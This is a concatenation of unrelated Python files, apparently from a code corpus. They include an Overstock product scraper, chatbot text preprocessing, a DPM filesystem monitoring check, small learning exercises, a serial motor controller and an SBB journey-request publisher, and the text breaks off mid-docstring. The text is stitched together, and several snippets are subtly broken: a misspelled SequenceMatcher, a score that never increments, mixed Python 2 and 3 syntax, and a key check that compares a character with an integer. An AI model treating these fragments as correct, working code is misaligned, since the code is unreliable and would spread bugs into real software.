active_sheet.cell(row=rowNum, column=colNum).value = val
# scrape them, product by product
for url in gh(url):
print(url)
print('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')
rowNum = rowNum+1
active_sheet.cell(row=rowNum, column=19).value = str(url)
try:
response = requests.get(url)
soup = BeautifulSoup(response.content, 'html.parser')
except Exception as e:
sleep(10)
response = requests.get(url)
soup = BeautifulSoup(response.content, 'html.parser')
try:
# prod title
elem_value = (soup.find('h1')).text.strip()
active_sheet.cell(row=rowNum, column=1).value = str(elem_value)
elem_value = " ".join(elem_value.split())
print(elem_value, 'title')
except Exception as e:
print(e) #reason.
pass
try:
# price1
elem_value = soup.find('span', {"class": "monetary-price-value"})['content']
active_sheet.cell(row=rowNum, column=2).value = str(elem_value)
print(elem_value, 'price')
except Exception as e:
print(e) #reason.
pass
try:
# price2
elem_value = soup.find('span', {"class": 'reference-price'}).text.strip()
active_sheet.cell(row=rowNum, column=3).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# shipping
elems = soup.find('div', {"class": 'shipping-returns'})
h5s = elems.find_all('h5')
ps = elems.find_all('p')
for elem in h5s:
if 'Shipping:' == str(elem.text):
index = h5s.index(elem)
elem_value = elem.find_next('p').text.strip()
print(elem_value, 'shipping')
active_sheet.cell(row=rowNum, column=4).value = str(elem_value)
elif 'Standard Return Policy:' in str(elem):
elem_value = elem.text
print(elem_value, 'return shipping')
active_sheet.cell(row=rowNum, column=5).value = str(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# category
elems = soup.find('ul', {"class": 'breadcrumbs'})
elems = elems.find_all('li')
elem_value = elems[2].text.strip()
print(elem_value)
active_sheet.cell(row=rowNum, column=6).value = str(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# reviews
elem_value = soup.find('span', {"class": "count"}).text.strip()
active_sheet.cell(row=rowNum, column=7).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# average review
elem_value = soup.find('div', {"class": "overall-rating"}).text.strip()
active_sheet.cell(row=rowNum, column=8).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# low quantity verified
elem_value = soup.find('div', {"class": "sellout-risk"}).text.strip()
active_sheet.cell(row=rowNum, column=9).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# out of stock -- verified
elem_value = soup.find('div', {"class": "out-of-stock-label"}).text.strip()
active_sheet.cell(row=rowNum, column=10).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# new arrival -- ver
elem_values = soup.find_all('div', {"class": "message"})
for elem in elem_values:
elem_value = elem.text.strip()
if 'New Arrival' in elem_value:
elem_value = 'New Arrival'
print(elem_value)
active_sheet.cell(row=rowNum, column=11).value = str(elem_value)
elif 'Flash Deal' in elem_value:
elem_value = 'Flash Deal'
print(elem_value)
elif 'Top Seller' in elem_value:
elem_value = 'Top Seller'
print(elem_value)
active_sheet.cell(row=rowNum, column=13).value = str(elem_value)
elif 'Clearance' in elem_value:
elem_value = 'Clearance'
print(elem_value)
active_sheet.cell(row=rowNum, column=12).value = str(elem_value)
else:
elem_value = ''
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# exclusive - ver
elem_value = soup.find('div', {"class": "clickable-icon"}).text.strip()
if "exclusive" in str(elem_value).lower():
elem_value = 'Exclusive'
else:
elem_value = ''
active_sheet.cell(row=rowNum, column=14).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# special
elem_value = soup.find('div', {"class": "clickable-icon"}).text.strip()
if "special" in str(elem_value).lower():
elem_value = 'Special'
else:
elem_value = ''
active_sheet.cell(row=rowNum, column=15).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# weekly deals -
elem_value = soup.find('span', {"class": "clickable-icon"})
if "weekly" in str(elem_value).lower():
elem_value = elem_value['title']
else:
elem_value = ''
active_sheet.cell(row=rowNum, column=16).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# options -- variations
elem_values = soup.find('div', {"id": "optbreakout"})
titles = elem_values.find_all('h4')
titles = [h4.text.strip() for h4 in titles]
elem_value = " & ".join(titles)
print(elem_value)
active_sheet.cell(row=rowNum, column=17).value = str(elem_value)
except Exception as e:
print(e) #reason.
pass
try:
# rewards - ver //*[@id="clubo-container"]/div[3]/p[2]
elem_value = soup.find('p', {"class": "co-me-rewards"}).text.strip()
active_sheet.cell(row=rowNum, column=18).value = str(elem_value)
print(elem_value)
except Exception as e:
print(e) #reason.
pass
print("Product " +str(rowNum)+ "'-Saved!'")
print
print
print
book.save(xl)
if __name__ == "__main__":
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',
'Accept-Encoding': 'none',
'Accept-Language': 'en-US,en;q=0.8',
'Connection': 'keep-alive'}
app = simpleapp_tk(None)
app.title('OVERSTOCK.COM SCRAPER')
app.geometry('{}x{}'.format(750, 129))
center(app)
app.mainloop()
#!/usr/bin/python
# -*- coding: iso-8859-1 -*- |
# -*- coding: utf-8 -*-
import sys
sys.path.append(('..'))
import lib.Utils as U
import os
@U.log_flie_function()
def get_case_yaml_path():
ini = U.ConfigIni()
yaml_path = ini.get_ini('test_case','case')
return get_all_case(yaml_path,'.yaml')
def get_all_case(directory,extension_name):
file_dict = {}
for parent, dirnames, filenames in os.walk(directory):
for filename in filenames:
if 'filter' not in filename:
if filename.endswith(extension_name):
path = os.path.join(parent,filename)
file_dict[filename] = path
return file_dict
if __name__ == '__main__':
a = get_case_yaml_path()
print type(a)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Oct 26 11:41:17 2018
Building a chatbot with NLP
@author: CURIACOSI1
"""
import numpy as np
import tensorflow as tf
import re
import time
############## PART 1 - DATA PREPROCESSING #################
# Importing the datasets
lines = open('movie_lines.txt', encoding = 'utf-8', errors = 'ignore').read().split('\n')
conversations = open('movie_conversations.txt', encoding = 'utf-8', errors = 'ignore').read().split('\n')
# Creating a dictionary that maps each line and its id
id2line ={}
for line in lines:
_line= line.split('+++$+++')
if len(_line) == 5:
id2line[_line[0].replace(" ", "")] = _line[4]
# Creating a list of all the conversations
conversation_ids = []
for conversation in conversations[:-1]: # The last row is empty
# take the last element and remuve the square braket
_conversation = conversation.split('+++$+++')[-1][2:-1].replace("'", "").replace(" ", "")
conversation_ids.append(_conversation.split(','))
# Getting seperately the questions and the answers
# NOTE: In the 'conversation_ids' list the first code of every element is the question
# and the second code is the answer
questions = []
answers = []
for conversation in conversation_ids:
for i in range(len(conversation) -1):
questions.append(id2line[conversation[i]])
answers.append(id2line[conversation[i+1]])
# Cleaning of the text
def clean_text(text):
text = text.lower()
text = re.sub(r"i'm", "i am", text)
text = re.sub(r"he's", "he is", text)
text = re.sub(r"she's", "she is", text)
text = re.sub(r"that's", "that is", text)
text = re.sub(r"what's", "what is", text)
text = re.sub(r"where's", "where is", text)
text = re.sub(r"there's", "there is", text)
text = re.sub(r"won't", "will not", text)
text = re.sub(r"can't", "cannot", text)
text = re.sub(r"can ' t", "cannot", text)
text = re.sub(r"didn't", "did not", text)
text = re.sub(r"don't", "do not", text)
text = re.sub(r"doesn't", "does not", text)
text = re.sub(r"aren't", "are not", text)
text = re.sub(r"isn't", "is not", text)
text = re.sub(r"haven't", "have not", text)
text = re.sub(r"couldn't", "could not", text)
text = re.sub(r"it's", "it is", text)
text = re.sub(r"\'ll", " will", text)
text = re.sub(r"\'ve", " have", text)
text = re.sub(r"\'d", " would", text)
text = re.sub(r"\'re", " are", text)
text = re.sub(r"\\", "", text)
text = re.sub(r"/", "", text)
text = re.sub(r"\[", "", text)
text = re.sub(r"\]", "", text)
text = re.sub(r'"', '', text)
text = re.sub(r"[-|'.&?*,;:<>{}!]", "", text)
text = re.sub(r'[-#%".]', "", text)
text = re.sub(r"[-@+=-]", "", text)
text = re.sub(r"[-()$]", "", text)
text = re.sub(r" ", " ", text)
text = text.strip()
return text
# Cleaning questions
clean_questions = []
for question in questions:
clean_questions.append(clean_text(question))
# Cleaning answers
clean_answers = []
for answer in answers:
clean_answers.append(clean_text(answer))
# Mapping the words occurences in order to remove not frequent words
word2count = {}
for question in clean_questions:
for word in question.split():
if word not in word2count:
word2count[word] = 1
else:
word2count[word] += 1
for answer in clean_answers:
for word in answer.split():
if word not in word2count:
word2count[word] = 1
else:
word2count[word] +=1
# FILTERING AND TOKENIZATION
# Creating two dictionaries that map the questions words and the answer words to unique integer
threshold = 20
questionwords2int ={}
word_number = 0
for word, count in word2count.items():
if count >= threshold:
questionwords2int[word] = word_number
word_number +=1
answerwords2int ={}
word_number = 0
for word, count in word2count.items():
if count >= threshold:
answerwords2int[word] = word_number
word_number +=1
# Adding the last tokens to the two dictionaries
tokens = ['<PAD>', '<EOS>', '<OUT>', '<SOS>']
for token in tokens:
questionwords2int[token] = len(questionwords2int) + 1
for token in tokens:
answerwords2int[token] = len(answerwords2int) + 1
# Creating the inverse dictionary of the answerwords2int dictionary
answerints2word = {w_i: w for w, w_i in answerwords2int.items()}
# Adding the End of String token to the end of every answer
for i in range(len(clean_answers)):
clean_answers[i] += ' <EOS>'
# Translate all the questions and answers (clean_answers, clean_questions)
# into the unique integer that was mapped into answerints2word
# and replacing all the words that were filtered out with <OUT>
questions_to_int = []
for question in clean_questions:
ints = []
for word in question.split():
if word not in questionwords2int:
ints.append(questionwords2int['<OUT>'])
else:
ints.append(questionwords2int[word])
questions_to_int.append(ints)
answers_to_int = []
for answer in clean_answers:
ints = []
for word in answer.split():
if word not in answerwords2int:
ints.append(answerwords2int['<OUT>'])
else:
ints.append(answerwords2int[word])
answers_to_int.append(ints)
# Sorting both the questions and answers by the lenght of the questions
sorted_clean_questions = []
sorted_clean_answers = []
for length in range(1, 25 + 1):
for i in enumerate(questions_to_int):
if len(i[1]) == length:
sorted_clean_questions.append(questions_to_int[i[0]])
sorted_clean_answers.append(answers_to_int[i[0]])
############# PART 2 - BUILDING THE SEQ2SEQ MODEL ##############
# Creating the placeholders for input and targhets
def model_inputs():
# Arguments: placeholder(type of input, matrix dimension, name of input)
inputs = tf.placeholder(tf.int32, [None, None], name = 'input')
targets = tf.placeholder(tf.int32, [None, None], name = 'target')
lr = tf.placeholder(tf.float32, name = 'learning_rate')
keep_prob = tf.placeholder(tf.float32, name = 'keep_prob')
return inputs, targets, lr, keep_prob
# Processing the targets
def preprocess_targets(targets, word2int, batch_size):
# Arguments: tf.fill(size of the matrix, )
left_side = tf.fill([batch_size, 1], word2int['<SOS>'])
right_side = tf.strided_slice(targets, [0,0], [batch_size, -1], [1,1])
preprocessed_targets = tf.concat([left_side, right_side], 1)
return preprocessed_targets
# Creating the Encoder RNN Layer
|
# -*- coding: utf-8 -*-
__author__ = 'Tan Chao'
'''
Test logger_manager module.
'''
from logger_manager import LoggerManager
logger = LoggerManager.get_logger('test')
logger.info('start...')
logger.debug('hello world')
logger.error('stop error')
try:
print(2/0)
except Exception, e:
logger.log_except() |
from difflib import SequenceMatcher
with open("1.txt") as f1, open("2.txt") as f2:
f1Data = f1.read()
f2Data = f2.read()
similarity = SequenceMaster(None, f1Data, f2Data).ratio()
print(similarity*100)
|
# %% imports
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.animation as animation
plt.ion()
import sys
import time
import pathlib
import numpy as np
import serial
import pandas as pd
from generated import *
_code_git_version="66e6811232d925e0f4a0f5c8f0da62125ed58de6"
_code_repository="https://github.com/plops/cl-py-generator/tree/master/example/26_copernicus_xsd/source/run_00_load_data.py"
_code_generation_time="19:41:48 of Friday, 2020-10-23 (GMT+1)"
fns=list(pathlib.Path("./").glob("S1*RAW*.SAFE/*.dat")) |
# Definição de uma classe para representar de forma abstrata as tarefas que precisaremos ordenar
class Tarefa:
nome = ""
inicio = 0
fim = 0 |
"""
Examen Parcial 1
Carrillo Medina Alexis Adrian (CMAA)
Nombre del programa: Parcial1.py
NOTA: La finalidad de este archivo es hacer las respectivas pruebas.
Los algoritmos se encuentran en matrices/Matriz.py
Se probo usando linux.
"""
#----- Seccion de bibliotecas
from matrices import Matriz
#----- Codigo
if __name__=="__main__":
# Metodo main
# Hacemos las respectivas pruebas
print("")
# Construimos la matriz de nxm
n=int(input("Ingresa el numero de columnas: \n"))
m=int(input("Ingresa el numero de filas: \n"))
Mat=Matriz.Matriz(n,m,Zeros=True)
# Agregamos los elementos
print("")
print ("Ingrese los elementos de la matriz")
for i in range(n):
for j in range(m):
Mat.changeElement(i,j,float(input("Elemento (%2d,%2d): " % (i, j))))
# Imprimimos la matriz
print("\nLa matriz es")
Mat.toString()
# Calculamos e imprimimos la inversa
print("\nSu inversa es")
Mat.matrizInversa().toString()
# Calculamos e imprimimos la potencia p
print("\n")
p=int(input("Ingrese la potencia "))
print("La Matriz a la potencia %d es" %(p))
Mat.potencia(p).toString()
print("") |
import os
here = os.path.dirname(os.path.abspath(__file__))
print(here)
filename = os.path.join(here, 'dt_policy_8.txt')
f = open(filename, "r")
s = ""
for line in f:
s+=line.strip()+"\\n"
f.close()
filename = os.path.join(here, 'dt_policy_8_string.txt')
f = open(filename, "w")
f.write(s)
f.close()
|
from alarm import alarm
from config import data
data = data.Data()
def symbol_to_string():
alarm_string = data.alarm
if '%' in alarm_string:
alarm_new = alarm_string.replace('%', ' percentage ')
else:
alarm_new = alarm_string
alarm.write_alarm(alarm_new)
|
#!/usr/bin/env python
##############################################################################
# Copyright (c) Members of the EGEE Collaboration. 2011.
# See http://www.eu-egee.org/partners/ for details on the copyright
# holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
#
# NAME : check_dpm_filesystem
#
# DESCRIPTION : Checks the filesystem freespace and status
#
# AUTHORS : Alexandre.beche@cern.ch
#
##############################################################################
import os
import re
from lcgdmcommon import *
class check_dpm_filesystem:
"Checks the DPM filesystem usage"
__version__ = "0.0.1"
__nagios_id__ = "DM-POOL"
# Defaults options
DEFAULT_WARNING = "30"
DEFAULT_CRITICAL = "15"
DEFAULT_DETAILS = "critical"
DEFAULT_STATE = "ALL"
DEFAULT_UNITS = None
# Defaults states
DEFAULT = 0
DISABLED = 1
RDONLY = 2
# Specific parameters, where key = short, value = long (i.e. {"h":"help", "C:":"command="})
# getopt format. The long version will be the one passed even when the short is specified
__additional_opts__ = {"w:": "warning=",
"c:": "critical=",
"d:": "details=",
"p:": "pools=",
"s:": "state=",
"u:": "units="}
# Specific usage information
__usage__ = """
\t-w, --warning\tSets the warning limit for free space. It can be two values: pool. It accepts suffixes. (e.g. -w 100G). Default %s.
\t-c, --critical\tSets the critical limit for free space. It can be two values: pool. It accepts suffixes. (e.g. -c 50G). Default %s.
\t-d, --details\tDefault level of details in the performance data output. Possible values: critical, warning, all. (Default: %s).
\t-p, --pools\tRestricts the pools to check to a list sparated by commas. (e.g. pool1,pool2)
\t-s, --state\tRestricts the fs state to check to a list sparated by commas. (e.g. RDONLY,DISABLED,ALL)
\t-u, --units\tAll sizes are output in these units: (k)ilobytes, (m)egabytes, (g)igabytes, (t)erabytes, (p)etabytes. Capitalise to use multiples of 1000 (S.I.) instead of 1024.
Retreive DPM FS informations.
""" % (DEFAULT_WARNING, DEFAULT_CRITICAL, DEFAULT_DETAILS)
# Methods
def __init__(self, opt = {}, args = []):
"""
Constructor
@param opt Contains a dictionary with the long option name as the key, and the argument as value
@param args Contains the arguments not associated with any option
"""
# Pools
self.pools = None
if "pools" in opt:
self.pools = opt["pools"].split(',')
# States
self.state = [self.DEFAULT_STATE]
if "state" in opt:
self.state = opt["state"].split(",")
# Get other options
opt_warning = self.DEFAULT_WARNING
opt_critical = self.DEFAULT_CRITICAL
opt_details = self.DEFAULT_DETAILS
opt_state = self.DEFAULT_STATE
opt_units = self.DEFAULT_UNITS
if "warning" in opt:
opt_warning = opt["warning"]
if "critical" in opt:
opt_critical = opt["critical"]
if "details" in opt:
opt_details = opt["details"]
if "units" in opt:
opt_units = opt["units"]
self.warning = real_bytes(opt_warning)
self.critical = real_bytes(opt_critical)
self.details = opt_details
self.units = opt_units
self.pools = None
# if the --pools option is set, restrain the results to that list
def filter_pools(self, pool_array):
filtering_pool_array = []
for pool in pool_array:
if pool.poolname in self.pools:
filtering_pool_array.append(pool)
return filtering_pool_array
def main(self):
"""
Test code itself. May raise exceptions.
@return A tuple (exit code, message, performance)
"""
return_code = EX_OK
import dpm
# Get pools
(stat, pool_array) = dpm.dpm_getpools()
if stat != 0:
return (EX_UNKNOWN, "Could not get the pools (%d)" % dpm.C__dpm_errno(), None)
# if the --pools option is set, restrain the results to that list
if self.pools is not None:
pool_array = self.filter_pools(pool_array)
critical, warning = 0, 0
critical_fs, warning_fs = "", ""
fs_summary = {}
# For each pool, retreive the list of filesystem
for pool in pool_array:
_, filesystems = dpm.dpm_getpoolfs(pool.poolname)
for fs in filesystems:
fs_name, fs_capacity, free_space = fs.fs, fs.capacity, fs.free
warning_threshold, critical_threshold = (self.warning * fs_capacity / 100), (self.critical * fs_capacity / 100)
# Keep only FS with the wanted state (or ALL if flag set)
if ("ALL" not in self.state) and (fs.status not in self.state):
continue
# Case of critical state detected
if fs.free < critical_threshold:
if return_code < EX_CRITICAL:
return_code = EX_CRITICAL
critical += 1
if self.details in ["all", "critical", "warning"]:
fs_summary[fs.server+":"+fs.fs] = [fs.free, warning_threshold, critical_threshold, fs.capacity]
# Case of warning state detected
elif fs.free < warning_threshold:
if return_code < EX_WARNING:
return_code = EX_WARNING
warning += 1
if self.details in ["all", "warning"]:
fs_summary[fs.server+":"+fs.fs] = [fs.free, warning_threshold, critical_threshold, fs.capacity]
elif self.details == "all":
fs_summary[fs.server+":"+fs.fs] = [fs.free, warning_threshold, critical_threshold, fs.capacity]
performance_data = ""
for key, value in fs_summary.iteritems():
performance_data += key
performance_data += "="
performance_data += str(standard_units(value[0], self.units))
if self.units is not None:
performance_data += str(self.units)
performance_data += "B;"
performance_data += str(standard_units(value[1], self.units)) + ";"
performance_data += str(standard_units(value[2], self.units)) + ";0;"
performance_data += str(standard_units(value[3], self.units)) + " "
return_data = str(critical) + " criticals and " + str(warning) + " warnings"
return (return_code, return_data, performance_data)
# When called directly
if __name__ == "__main__":
run(check_dpm_filesystem)
|
import random
score = 0
arr = ["rock", "paper", "scissors"]
def gameThree():
num = 0
while num !=3:
num = num + 1
game()
def game():
comp = randomPlay()
print(comp)
x = input("rock paper scissors shoot !!!!")
if x == "rock":
if comp == x:
print("tie")
if comp == "paper":
print("you lost")
if comp == "scissors":
print("you won")
score + 1
if x == "paper":
if comp == x:
print("tie")
if comp == "scissors":
print("you lost")
if comp == "rock":
print("you won")
score + 1
if x == "scissors":
if comp == x:
print("tie")
if comp == "rock":
print("you lost")
if comp == "paper":
print("you won")
score +1
print(score)
def randomPlay():
rand = random.randrange(0,3)
# print(arr[rand])
return arr[rand]
gameThree()
|
s2=list(input("s = ").replace(",",'').replace(".",'').replace("'",'').replace('"','').split())
for i in s2:
if len(i)%2==0:
print(i) |
from tkinter import *
from PIL import ImageTk,Image
root = Tk()
root.title('images - tutorial')
# Does not work fore some unclear reason
root.iconbitmap('images/diablo.ico')
img_1 = ImageTk.PhotoImage(Image.open('images/test.png'))
img_2 = ImageTk.PhotoImage(Image.open('images/fireMario_PF.png'))
img_3 = ImageTk.PhotoImage(Image.open('images/filter.png'))
img_list = [img_1, img_2, img_3]
img_nmr = 0
img_label = Label(image=img_1)
img_label.grid(row=0, column=0,columnspan=3)
def forward():
global img_nmr, img_label
if img_nmr != len(img_list)-1:
img_nmr += 1
img_label.grid_forget()
img_label = Label(image=img_list[img_nmr])
img_label.grid(row=0, column=0,columnspan=3)
def backward():
global img_nmr, img_label
if img_nmr != 0:
img_nmr -= 1
img_label.grid_forget()
img_label = Label(image=img_list[img_nmr])
img_label.grid(row=0, column=0,columnspan=3)
button_back = Button(root, text = '<<', command = lambda: backward())
button_exit = Button(root, text = 'EXIT PROGRAM', command=root.quit)
button_forw = Button(root, text = '>>', command = lambda: forward())
button_back.grid(row=1,column=0)
button_exit.grid(row=1,column=1)
button_forw.grid(row=1,column=2)
root.mainloop() |
# Generated by Django 2.2 on 2020-10-04 14:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('instagram', '0009_auto_20201004_1708'),
]
operations = [
migrations.AlterField(
model_name='socinstaproxy',
name='location',
field=models.CharField(max_length=200, null=True, verbose_name='Location'),
),
]
|
'''
657. Judge Route Circle
Initially, there is a Robot at position (0, 0). Given a sequence of its moves, judge if this robot makes a circle, which means it moves back to the original place.
The move sequence is represented by a string. And each move is represent by a character. The valid robot moves are R (Right), L (Left), U (Up) and D (down). The output should be true or false representing whether the robot makes a circle.
Example 1:
Input: "UD"
Output: true
Example 2:
Input: "LL"
Output: false
'''
def judgeCircle(self, moves):
"""
:type moves: str
:rtype: bool
"""
moves_hash = {"R":0, "L":0, "U":0,"D":0}
total = 0
for i in moves:
moves_hash[i] += 1
print moves_hash
if moves_hash["R"] == moves_hash["L"] and moves_hash["U"] == moves_hash["D"]:
return True
return False |
age = int(input('Please input your age: '))
yearBorn = 2021 - age
print(yearBorn) |
import serial
import numpy as np
import cv2
def send_commends(ser, motors, commands):
for motor in motors:
for direction_cmd in commands:
command_string = bytes(2)
command_string = bytearray(command_string)
command_string[0] = motor # 2 motor 1, 4 motor 2, 8 motor 3
command_string[1] = direction_cmd # 2 forward, 4 backward, 8 release
print(command_string)
command_string = bytes(command_string)
ser.write(command_string) # write a string
def test_dc_motors():
motors = set()
commands = []
# ser = serial.Serial('COM5') # open serial port
ser = serial.Serial('/dev/ttyUSB1') # open serial port
print(ser.name) # check which port was really used
while True:
img = np.zeros((200, 200), np.uint8)
cv2.imshow('Main', img)
key = cv2.waitKey(2)
if key > 0:
key = chr(key)
if key in [ord('q')]:
break
if key in ['2', '4', '8']:
motor = int(key)
if motor in motors:
motors.remove(motor)
else:
motors.add(motor)
if key == 'w':
commands = [2]
if key == 's':
commands = [8]
if key == 'x':
commands = [4]
print(key, list(motors), commands)
send_commends(ser, motors, commands)
ser.close()
test_dc_motors()
|
import math
num = int(input('Digite um número: '))
print('---------------------------------')
print('[1] Binário')
print('[2] Octal')
print('[3] Hexadecimal')
conv = int(input('Digite a base de conversão: '))
if conv == 1:
print('O número em binário é: {}'.format(bin(num)[2:]))
elif conv == 2:
print('O número em octal é: {}'.format(oct(num)[2:]))
else:
print('O número em hexadecimal é: {}'.format(hex(num)[2:]))
|
#program to print the fibonaccci series
n=input('Enter no of digits :-')
first=0
second=1
print first,second,
count=3
while count<=n:
third=first+second
print third,
first=second
second=third
count=count+1
|
# Core python
import logging
import os
import pika
import uuid
import xml.etree.cElementTree as ET
import datetime
from datetime import timedelta
import ast
import json
# sci stack
import pandas as pd
import numpy as np
# Vibe
from rabbit_publisher_consumer import PublisherBot
# SBB
import itinerary
import init_data_struct as ids
import xml_path
import remove_itineraries as ri
TRIP_CACHE = dict()
LEG_SUB_TYPES = ['S','IR','R','RE','EC','RJ','ICE','IC','ICN','VAE','TGV']
def roundTime(dt=None, dateDelta=datetime.timedelta(minutes=1), to='average'):
"""Round a datetime object to a multiple of a timedelta
dt : datetime.datetime object, default now.
dateDelta : timedelta object, we round to a multiple of this, default 1 minute.
Author: Thierry Husson 2012 - Use it as you want but don't blame me.
Stijn Nevens 2014 - Changed to use only datetime objects as variables
"""
roundTo = dateDelta.total_seconds()
if dt == None : dt = datetime.datetime.now()
seconds = (dt - dt.min).seconds
if to == 'up':
rounding = (seconds + roundTo) // roundTo * roundTo
elif to == 'down':
rounding = seconds // roundTo * roundTo
else:
# // is a floor division, not a comment on following line:
rounding = (seconds+roundTo/2) // roundTo * roundTo
return dt + datetime.timedelta(0,rounding-seconds,-dt.microsecond)
def check_trip_cache(params, max_res, leave_at):
ret = TRIP_CACHE.get((params['from_lat'], params['from_lon'], params['to_lat'], params['to_lon'], params['rounded_timestamp'],
max_res, leave_at))
# periodic clearing - we can probably figure out a better way to do this
if len(TRIP_CACHE) > 10000:
TRIP_CACHE.clear()
return ret
class SBBPublisherBot(PublisherBot):
def publish(self, trip, loop_through, exchange, routing_key):
xml_str_fname = os.path.dirname(os.path.realpath(__file__)) + '/xml/sbb_api.xml'
request_exchange, response_exchange = exchange[0], exchange[1]
for l in loop_through:
params = trip.gen_param_seg(MaxResultNumber=int(l[0]), leave_at=ast.literal_eval(l[1]))
req_xml = trip.gen_query_xml_str(params, xml_str_fname)
max_res = l[0]
leave_at = l[1]
msg = {"uuid": trip.batch_id + "_" + trip.trip_id + "_" + max_res + "_" + leave_at, "xml": req_xml}
trip.params[(max_res, leave_at)] = params
properties = pika.BasicProperties(app_id='example-publisher',
content_type='application/json',
headers=msg)
resp = check_trip_cache(params, max_res, leave_at)
if resp:
logging.debug("Duplicate trip, sending XML response")
json_resp = {"uuid": trip.batch_id + "_" + trip.trip_id + "_" + max_res + "_" + leave_at, "xml": resp}
self.pub_channel.basic_publish(response_exchange, routing_key, json.dumps(json_resp, ensure_ascii=True).encode('utf8'),
properties)
else:
# channel.basic_publish('spf_request_exchange', 'spf_response_queue', json.dumps(msg, ensure_ascii=True), properties)
self.pub_channel.basic_publish(request_exchange, routing_key, json.dumps(msg, ensure_ascii=False).encode('utf8'),
properties)
class Trip(object):
def __init__(self, trip, batch_id, CONFIG):
self.config = CONFIG
self.trip = trip
self.trip_id = str(uuid.uuid4())
self.batch_id = batch_id
self.trip_link_df, self.itinerary_df, self.legs_df, self.segments_df = ids.initialize_all_empty_df()
self.itineraries = []
# self.request_params = [(6, True), (6, False), (-6, True), (-6, False)]
# key here - 0 = Started, 1 = in process, 2 = finished
self.request_params = {("6", "True") : 0, ("6", "False") : 0, ("-6", "True") : 0, ("-6", "False") : 0}
self.requests_processed = 0
self.params = dict()
self.pub_creds = {'rabbit_user': self.config.get('rabbit', 'rabbit_user'),
'rabbit_pw': self.config.get('rabbit', 'rabbit_pw'),
'rabbit_host': self.config.get('rabbit', 'rabbit_host'),
'rabbit_port': int(self.config.get('rabbit', 'rabbit_port'))}
def publish(self, publish_params):
# this is our little sub-pub bot that handles publishing requests and listening for responses
bot = SBBPublisherBot(self.pub_creds)
bot.publish(self, publish_params, ["spf_request_exchange", "spf_response_exchange"], '')
# stop the publisher
bot.stop_publisher()
# remove
del bot
def publish_reqs(self):
logging.debug("Publishing requests for trip %s" % self.trip_id)
self.publish(self.request_params.keys())
def republish_req(self, publish_param):
logging.debug("Republishing request for trip %s" % self.trip_id)
self.publish(publish_param)
def complete_processing(self):
# concat stuff
self.concat_trip_dfs()
self.concat_legs_dfs()
self.concat_seg_dfs()
if not self.trip_link_df.empty:
self.trip_link_df['vid'] = self.trip['vid']
self.trip_link_df['mot_segment_id'] = self.trip['mot_segment_id']
# Not using vid / mot_segment_id as indexes since they're identical for all...
# Hierarchical indexes need to be sorted for faster operation (uses np.searchsorted )
self.trip_link_df.sort_values(['itinerary_id', 'leg_id', 'segment_id', ], inplace=True)
self.trip_link_df.set_index(['itinerary_id', 'leg_id', 'segment_id', ], inplace=True)
def gen_param_seg(self, MaxResultNumber=3, leave_at=True, api_version='v2'):
# Some parameters need a bit of reformatting
params = {
'api_version': api_version, # check, there might some other dependencies inside the XML...
'MaxResultNumber': MaxResultNumber,
'from_lat': int(round(self.trip['lat_start'] * 10 ** 6)), # int, lat/lon * 1e6
'from_lon': int(round(self.trip['lon_start'] * 10 ** 6)),
'to_lat': int(round(self.trip['lat_end'] * 10 ** 6)),
'to_lon': int(round(self.trip['lon_end'] * 10 ** 6)),
# These times are used by python but not for the XML query so no reformat
'trip_time_start': self.trip['trip_time_start'], # previously starttriptime
'trip_time_end': self.trip['trip_time_end'] # previously endtriptime
}
if MaxResultNumber > 0:
rounding = "down"
else:
rounding = "up"
if leave_at: # calculate trip to start at this time
params['timestamp'] = self.trip['time_start'].strftime(
"%Y-%m-%dT%H:%M:%S") # timestamp format: 2015-08-04T14:00:00
params['DateTimeType'] = 'ABFAHRT'
params['rounded_timestamp'] = roundTime(self.trip['time_start'], to=rounding)
else: # calculate trip to arrive by this time
params['timestamp'] = self.trip['time_end'].strftime(
"%Y-%m-%dT%H:%M:%S") # timestamp format: 2015-08-04T14:00:00
params['DateTimeType'] = 'ANKUNFT'
params['rounded_timestamp'] = roundTime(self.trip['time_end'], to=rounding)
params['mot_segment_id'] = self.trip['mot_segment_id']
return params
def gen_query_xml_str(self, params, xml_str_fname):
"""
XML query that calls the SBB API
params are the lat/lon/timestamp/MaxResultNumber which specify the query
"""
if os.path.isfile(xml_str_fname):
with open(xml_str_fname, "r") as myfile:
request_str = myfile.read()
return request_str.format(**params)
else:
logging.error('XML template file not found at: {p}'.format(p=xml_str_fname))
raise IOError
def build_single_itinerary(self, response, max_res, leave_at):
"""
Takes in the XML response and turns it into an etree. Then builds tables containing itinerary/leg/segment including
the node in the tree where they reside.
The build_ functions then populate all fields of the dataframes with the data associated with that node in the
etree. All the paths for the various fields are stored as functions in the xml_path.py file.
